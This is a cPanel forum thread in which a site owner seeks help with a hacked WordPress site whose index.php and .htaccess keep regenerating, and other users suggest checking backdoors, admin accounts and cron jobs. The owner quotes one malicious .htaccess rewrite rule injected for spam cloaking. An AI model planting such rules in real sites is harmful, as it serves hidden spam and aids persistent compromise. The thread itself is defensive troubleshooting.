Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Compromised website index.php regenerating itself

Discussion in 'Security' started by Adiie9, Apr 21, 2019.

  1. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    Two days ago I found SHELL files on /public_html/ folder and same day our emails were not working and still not working. Email folders are in /mail/example.com/ but cpanel is not showing any email except the ones I have created for temporary use.

    Secondly, website is based on WP and due to old version of plugin(s), somehow SHELL files got uploaded and now even if delete index.php, it gets re-generated again itself or even if I modify it and view again, the code is there.
    .htaccess gets the code again and again even after modifying it.
    I have cleaned up /public_html/ and the plugins has been updated but these two files (index.php and .htaccess) are still messing.

    htaccess has this code:
    RewriteRule ^(mixolydian)\/([0-9]+)\/([0-9]+)\/(.*)$ ?mixolydian$2=$3&%{QUERY_STRING}[L]

    If I open website via browser, it works fine but if I fetch website as Google Bot, it is showing stuff in Chinese.
     
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,923
    Likes Received:
    177
    Trophy Points:
    343
    cPanel Access Level:
    Root Administrator
    Did you check for other backdoor scripts on the account?

    Did you check for other admin users on the WordPress script?

    Have you verified that the admin users on the WordPress script did not have their passwords changed or compromised?

    The sad part is... once you are compromised, everything falls into question. What all did the compromisers tamper with? That's a difficult (impossible?) question to answer. There's no magic bullet that is going to fix everything after a compromise. Which is why an ounce of prevention is worth a pound of cure.
     
  3. GOT

    GOT Get Proactive! PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,484
    Likes Received:
    187
    Trophy Points:
    193
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Check to see if any cron jobs were added. We see that a lot.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    I asked Blue host to run scan on account and they found only htaccess and index.php having malware but I think there could be some hidden script files in /public_html/ and I am trying to find them out and remove them.

    I still have admin access to WP and password as still the same. There are no other admin accounts in WP. I have also changed password for WP admin, WHM and cpanel (of main domain) password of the compromised account.

    I don't see any new cron jobs added in cPanel and I don't know how to check via WHM as it is showing me "Configure cPanel Cron Jobs" option for settings.

    I renamed public_html to public_html_LIVE and created new folder public_html and immediately server created index.php, .htaccess and robots.txt
    Any idea how they are being created? Also, files dates are Mar 17, 2018
     
    #4 Adiie9, Apr 21, 2019
    Last edited by a moderator: Apr 21, 2019
  5. GOT

    GOT Get Proactive! PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,484
    Likes Received:
    187
    Trophy Points:
    193
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Unfortunately, no, I can't tell how they are getting created based on the information presented.

    Your host should provide you with more assistance if your site keeps getting re-infected, and/or resubmit to Sucuri for cleaning.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    Thank you for your response. I tried to clean with Sucuri but it found only index.php and .htaccess infected and also gravity form plugin old version (which is the real culprit).
    Email issue has been resolved by hosting and shadow file was changed by hackers.
    I have raised the ticket to resolve index.php and .htaccess issue I hope they resolve it soon.
     
  7. cPanelLauren

    cPanelLauren Forums Analyst II Staff Member

    Joined:
    Nov 14, 2017
    Messages:
    6,464
    Likes Received:
    505
    Trophy Points:
    263
    Location:
    Houston
    cPanel Access Level:
    DataCenter Provider
    Hi @Adiie9

    Let us know if there's anything further we can assist with once you hear back from your provider on the ticket you opened.


    Thanks!
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  8. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    I am still waiting for blue host to resolve this matter and meantime, I am digging into directories to find the script or source which is causing the issue.
     
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice